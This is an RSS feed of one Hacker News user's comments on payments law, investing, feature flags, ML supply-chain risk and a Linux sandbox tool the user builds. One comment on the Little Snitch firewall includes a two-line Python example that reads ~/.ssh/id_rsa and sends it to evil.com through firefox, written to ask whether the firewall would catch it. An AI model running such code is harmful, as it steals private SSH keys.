<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Hacker News: mixedbit</title><link>https://news.ycombinator.com/user?id=mixedbit</link><description>Hacker News RSS</description><docs>https://hnrss.org/</docs><generator>hnrss v2.1.1</generator><lastBuildDate>Mon, 13 Jul 2026 03:42:20 +0000</lastBuildDate><atom:link href="https://hnrss.org/user?id=mixedbit" rel="self" type="application/rss+xml"></atom:link><item><title><![CDATA[New comment by mixedbit in "Monetization Gateway: Charge for any resource behind Cloudflare via x402"]]></title><description><![CDATA[
<p>Normal vending machine transactions are B2C transactions, so the buyer cannot be a company - cannot pay with company money and cannot deduce the payment as the company cost. I guess, the buyer can take a receipt from a vending machine and ask the vending machine owner to provide a B2B invoice based on the receipt, to make this a proper B2B payment.<p>Can you treat your remote service access as B2C only? Perhaps yes, but then the companies will not be able to use your service, pay from a company bank account and account this as a company cost, only individuals will be able to legally pay.<p>Vending machine is also located in a known physical country, so the owner knows what VAT to apply, the VAT of the country the machine is in. With software services the VAT should be applied based on the country where the buyer is located.</p>
]]></description><pubDate>Wed, 01 Jul 2026 18:46:51 +0000</pubDate><link>https://news.ycombinator.com/item?id=48751461</link><dc:creator>mixedbit</dc:creator><comments>https://news.ycombinator.com/item?id=48751461</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=48751461</guid></item><item><title><![CDATA[New comment by mixedbit in "Monetization Gateway: Charge for any resource behind Cloudflare via x402"]]></title><description><![CDATA[
<p>With payments the complexity is not only in accepting a payment, but largely in doing so legally. Someone makes a request to my company's paid service, I return 402 and get a stable coin back. Who do I invoice for this revenue? What value added tax do I apply to the invoice? If someone makes 10k paid requests within one month, do I have means of generating one invoice for them for all the usage, or is every request treated separately and results in 10k invoices?
Will CloudFlare handle this for me?</p>
]]></description><pubDate>Wed, 01 Jul 2026 18:00:54 +0000</pubDate><link>https://news.ycombinator.com/item?id=48750817</link><dc:creator>mixedbit</dc:creator><comments>https://news.ycombinator.com/item?id=48750817</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=48750817</guid></item><item><title><![CDATA[New comment by mixedbit in "Mag 7 starting to underperform [pdf]"]]></title><description><![CDATA[
<p>You are right, but if stock repurchase does not increase market cap, dividend payment still decreases it (unless it would be fully reinvested in the same stock, which it is not, it is largely reinvested in largest caps).</p>
]]></description><pubDate>Mon, 29 Jun 2026 20:35:41 +0000</pubDate><link>https://news.ycombinator.com/item?id=48724836</link><dc:creator>mixedbit</dc:creator><comments>https://news.ycombinator.com/item?id=48724836</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=48724836</guid></item><item><title><![CDATA[New comment by mixedbit in "Mag 7 starting to underperform [pdf]"]]></title><description><![CDATA[
<p>Could outperformance of largest cap companies be partially explained by dividends paid by smaller caps? Reasoning behind this:<p>* Index investing raises in popularity, with index funds that automatically reinvest dividends being often preferred due to their tax efficiency.<p>* Large caps prefer to repurchase stocks, stock repurchases contribute fully towards a given company share price increase.<p>* Smaller caps still pay dividends, these dividends are then reinvested by index funds and the reinvestment is weighted by capitalization, so large caps share price benefits more from repurchases done with dividend cash paid by smaller caps. When dividend is paid, share price of a company that paid it is reduced, which further widens the performance gap between large and smaller caps.</p>
]]></description><pubDate>Mon, 29 Jun 2026 16:03:06 +0000</pubDate><link>https://news.ycombinator.com/item?id=48721018</link><dc:creator>mixedbit</dc:creator><comments>https://news.ycombinator.com/item?id=48721018</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=48721018</guid></item><item><title><![CDATA[New comment by mixedbit in "A way to exclude sensitive files issue still open for OpenAI Codex"]]></title><description><![CDATA[
<p>I work on a Linux sandbox that makes it easy to hide sensitive files from AI agents while keeping the files they need accessible. Check it out: <a href="https://github.com/wrr/drop" rel="nofollow">https://github.com/wrr/drop</a></p>
]]></description><pubDate>Sun, 28 Jun 2026 13:57:17 +0000</pubDate><link>https://news.ycombinator.com/item?id=48707297</link><dc:creator>mixedbit</dc:creator><comments>https://news.ycombinator.com/item?id=48707297</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=48707297</guid></item><item><title><![CDATA[/proc/self/exe overwrite from within a user namespace]]></title><description><![CDATA[
<p>Article URL: <a href="https://mixedbit.org/blog/2026/06/12/proc_self_exe_overwrite_from_within_a_user_namespace.html">https://mixedbit.org/blog/2026/06/12/proc_self_exe_overwrite_from_within_a_user_namespace.html</a></p>
<p>Comments URL: <a href="https://news.ycombinator.com/item?id=48517853">https://news.ycombinator.com/item?id=48517853</a></p>
<p>Points: 4</p>
<p># Comments: 0</p>
]]></description><pubDate>Sat, 13 Jun 2026 14:46:32 +0000</pubDate><link>https://mixedbit.org/blog/2026/06/12/proc_self_exe_overwrite_from_within_a_user_namespace.html</link><dc:creator>mixedbit</dc:creator><comments>https://news.ycombinator.com/item?id=48517853</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=48517853</guid></item><item><title><![CDATA[New comment by mixedbit in "Waymo Premier"]]></title><description><![CDATA[
<p>Except for LLM services, which move away from subscriptions</p>
]]></description><pubDate>Thu, 11 Jun 2026 19:55:27 +0000</pubDate><link>https://news.ycombinator.com/item?id=48495580</link><dc:creator>mixedbit</dc:creator><comments>https://news.ycombinator.com/item?id=48495580</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=48495580</guid></item><item><title><![CDATA[New comment by mixedbit in "Ask HN: What are tools you have made for yourself since the advent of AI?"]]></title><description><![CDATA[
<p>I made a sandbox to productively work with agents while restricting files they can read and write: <a href="https://github.com/wrr/drop" rel="nofollow">https://github.com/wrr/drop</a></p>
]]></description><pubDate>Mon, 08 Jun 2026 19:38:42 +0000</pubDate><link>https://news.ycombinator.com/item?id=48450581</link><dc:creator>mixedbit</dc:creator><comments>https://news.ycombinator.com/item?id=48450581</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=48450581</guid></item><item><title><![CDATA[New comment by mixedbit in "Anthropic confidentially submits draft S-1 to the SEC"]]></title><description><![CDATA[
<p>one possibility is that some heavily indebted AI infrastructure company will be unable to meet its dept obligations, which will cause banks that become heavily exposed to AI-infrastructure related dept to tumble</p>
]]></description><pubDate>Mon, 01 Jun 2026 21:04:14 +0000</pubDate><link>https://news.ycombinator.com/item?id=48362610</link><dc:creator>mixedbit</dc:creator><comments>https://news.ycombinator.com/item?id=48362610</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=48362610</guid></item><item><title><![CDATA[New comment by mixedbit in "Anthropic confidentially submits draft S-1 to the SEC"]]></title><description><![CDATA[
<p>sp500 has profitability requirement, I doubt LLM companies will show profits any time soon.</p>
]]></description><pubDate>Mon, 01 Jun 2026 20:56:09 +0000</pubDate><link>https://news.ycombinator.com/item?id=48362525</link><dc:creator>mixedbit</dc:creator><comments>https://news.ycombinator.com/item?id=48362525</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=48362525</guid></item><item><title><![CDATA[New comment by mixedbit in "Cloudflare Flagship"]]></title><description><![CDATA[
<p>This is just an implementation detail, a feature flag can very well be implemented with a Boolean in a database.<p>To me the main appeal of feature flags is that they allow to work on large features that often require months and many commits to finish in a main branch. This, at least to me, results in a more lightweight and more iterative development process. This contrasts with maintaining a separate branch, with perhaps separate deployment target for a large in-development features.</p>
]]></description><pubDate>Wed, 27 May 2026 06:49:04 +0000</pubDate><link>https://news.ycombinator.com/item?id=48290602</link><dc:creator>mixedbit</dc:creator><comments>https://news.ycombinator.com/item?id=48290602</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=48290602</guid></item><item><title><![CDATA[New comment by mixedbit in "Shai-Hulud Themed Malware Found in the PyTorch Lightning AI Training Library"]]></title><description><![CDATA[
<p>When I was doing Fast.AI Deep Learning course, I was surprised by the number of Python dependencies machine learning projects bring. Web front-end projects were always considered very third-party dependencies heavy, but to
me, the machine learning ecosystem looks much more entangled. In addition, unlike web development, which is considered security critical and has over the many years accumulated a lot of wisdom and good security-related practices, machine learning development looks much more ad-hoc, with many common software engineering practices not applied.<p>For example, at that time, one way to distribute machine learning models was via Python pickles. Which are executable objects with no restriction built in. Models in this format could do anything on a computer where the model was imported. Such an early 'wild-west' ecosystem can definitely make security compromises easier and resulting supply chain attacks more common.</p>
]]></description><pubDate>Thu, 30 Apr 2026 19:41:13 +0000</pubDate><link>https://news.ycombinator.com/item?id=47967274</link><dc:creator>mixedbit</dc:creator><comments>https://news.ycombinator.com/item?id=47967274</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47967274</guid></item><item><title><![CDATA[New comment by mixedbit in "A new spam policy for “back button hijacking”"]]></title><description><![CDATA[
<p>An interesting variant of a web phishing attack is to combine the back button hijacking with information that comes from the HTTP referer header. HTTP referer discloses from which website the user is coming from, when the user click the back button, the malicious site can take the user to the site that looks identical (except for the URL), but is attacker controlled.</p>
]]></description><pubDate>Tue, 14 Apr 2026 13:01:53 +0000</pubDate><link>https://news.ycombinator.com/item?id=47765121</link><dc:creator>mixedbit</dc:creator><comments>https://news.ycombinator.com/item?id=47765121</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47765121</guid></item><item><title><![CDATA[New comment by mixedbit in "Ask HN: What Are You Working On? (April 2026)"]]></title><description><![CDATA[
<p>I'm working on a sandbox for Linux terminal work with UX similar to Python virtualenv: <a href="https://github.com/wrr/drop" rel="nofollow">https://github.com/wrr/drop</a></p>
]]></description><pubDate>Mon, 13 Apr 2026 06:27:54 +0000</pubDate><link>https://news.ycombinator.com/item?id=47748336</link><dc:creator>mixedbit</dc:creator><comments>https://news.ycombinator.com/item?id=47748336</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47748336</guid></item><item><title><![CDATA[New comment by mixedbit in "LittleSnitch for Linux"]]></title><description><![CDATA[
<p>Recently I was wondering how viable it is to launch a niche, paid tool for Linux. I found that this is a very rare model, most tools are either just free, supported by sponsorship, supported by some paid cloud-based service that accompanies the tool, use an open-core model with paid add-ons.<p>I wonder if the decision of Little Snitch to make the Linux version free forever was also informed by this "no way to make money selling tools on Linux" wisdom or if there was another motivation. It seems that if any tool has chances of making decent money on Linux, a product like Little Snitch, which is already  well established, with working payment infrastructure would be a good candidate.</p>
]]></description><pubDate>Thu, 09 Apr 2026 09:39:11 +0000</pubDate><link>https://news.ycombinator.com/item?id=47701346</link><dc:creator>mixedbit</dc:creator><comments>https://news.ycombinator.com/item?id=47701346</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47701346</guid></item><item><title><![CDATA[New comment by mixedbit in "LittleSnitch for Linux"]]></title><description><![CDATA[
<p>OK, I see, so a limitation is also that I cannot block an individual script, I need to block a Python interpreter.</p>
]]></description><pubDate>Thu, 09 Apr 2026 09:34:57 +0000</pubDate><link>https://news.ycombinator.com/item?id=47701314</link><dc:creator>mixedbit</dc:creator><comments>https://news.ycombinator.com/item?id=47701314</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47701314</guid></item><item><title><![CDATA[New comment by mixedbit in "LittleSnitch for Linux"]]></title><description><![CDATA[
<p>I'm not a Little Snitch or Open Snitch user, I wonder if these firewalls are able to block requests done with the use of some other, allow-listed program.<p>Say I run a script `suspicious.py' and I deny this script from making any network requests. I also have firefox which is allowed to make any HTTPS requests. If suspicious.py does something like:<p><pre><code>   key = (Path.home() / '.ssh' / 'id_rsa').read_text()
   subprocess.Popen(['firefox', f'https://evil.com/upload/{key}'])
</code></pre>
will this request be blocked?</p>
]]></description><pubDate>Thu, 09 Apr 2026 09:05:02 +0000</pubDate><link>https://news.ycombinator.com/item?id=47701045</link><dc:creator>mixedbit</dc:creator><comments>https://news.ycombinator.com/item?id=47701045</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47701045</guid></item><item><title><![CDATA[New comment by mixedbit in "Axios compromised on NPM – Malicious versions drop remote access trojan"]]></title><description><![CDATA[
<p>Check also <a href="https://github.com/wrr/drop" rel="nofollow">https://github.com/wrr/drop</a> which is a higher-level tool than bwrap. It allows you to make such isolated sandboxes with minimal configuration.</p>
]]></description><pubDate>Tue, 31 Mar 2026 06:46:25 +0000</pubDate><link>https://news.ycombinator.com/item?id=47583599</link><dc:creator>mixedbit</dc:creator><comments>https://news.ycombinator.com/item?id=47583599</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47583599</guid></item><item><title><![CDATA[Show HN: Sandbox agents without losing your dev environment]]></title><description><![CDATA[
<p>Drop is a Linux sandboxing tool with a focus on a productive local workflow. It isolates programs and agents while preserving as many aspects of your work environment as possible.<p>The workflow is inspired by Python's virtualenv: create an environment, enter it, work normally - but with enforced sandboxing. To create a new Drop environment and run a sandboxed shell you simply:<p><pre><code>  alice@zax:~/project$ drop init
  Drop environment created with config at /home/alice/.config/drop/home-alice-project.toml
  alice@zax:~/project$ drop run
  (drop) alice@zax:~/project$ cat ~/.ssh/id_rsa
  cat: /home/alice/.ssh/id_rsa: No such file or directory
</code></pre>
Each Drop environments gets its own, isolated and easily disposable home dir. To ensure the sandbox matches your actual work environment, selected files and dirs from your original home dir are mounted in the sandbox, most of them read-only.<p>The need for a tool like Drop had been with me for a long time. I felt uneasy installing and running out-of-distro programs with huge dependency trees and no isolation. On the other hand I dreaded the naked root@b0fecb:/# Docker shell. The main thing that makes Docker great for deploying software - a reproducible, minimal environment - gets in the way of productive development work: tools are missing from a container; config files and environment variables are all unavailable.<p>The last straw that made me start building Drop was LLM agents. To work well - compile code, run tests, analyze git logs - agents need access to tools installed on the machine. But giving agents unrestricted access is so clearly risky, that almost every discussion on agentic workflows includes a rant about a lack of sandboxing.<p>Thanks, I'd love to hear what you think.</p>
<hr>
<p>Comments URL: <a href="https://news.ycombinator.com/item?id=47569579">https://news.ycombinator.com/item?id=47569579</a></p>
<p>Points: 4</p>
<p># Comments: 0</p>
]]></description><pubDate>Mon, 30 Mar 2026 01:58:33 +0000</pubDate><link>https://github.com/wrr/drop</link><dc:creator>mixedbit</dc:creator><comments>https://news.ycombinator.com/item?id=47569579</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47569579</guid></item><item><title><![CDATA[New comment by mixedbit in "Show HN: Crazierl – An Erlang Operating System"]]></title><description><![CDATA[
<p>Is the OS implemented from scratch, or is it a stripped down version of some existing OS?</p>
]]></description><pubDate>Sun, 29 Mar 2026 20:50:34 +0000</pubDate><link>https://news.ycombinator.com/item?id=47567169</link><dc:creator>mixedbit</dc:creator><comments>https://news.ycombinator.com/item?id=47567169</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47567169</guid></item></channel></rss>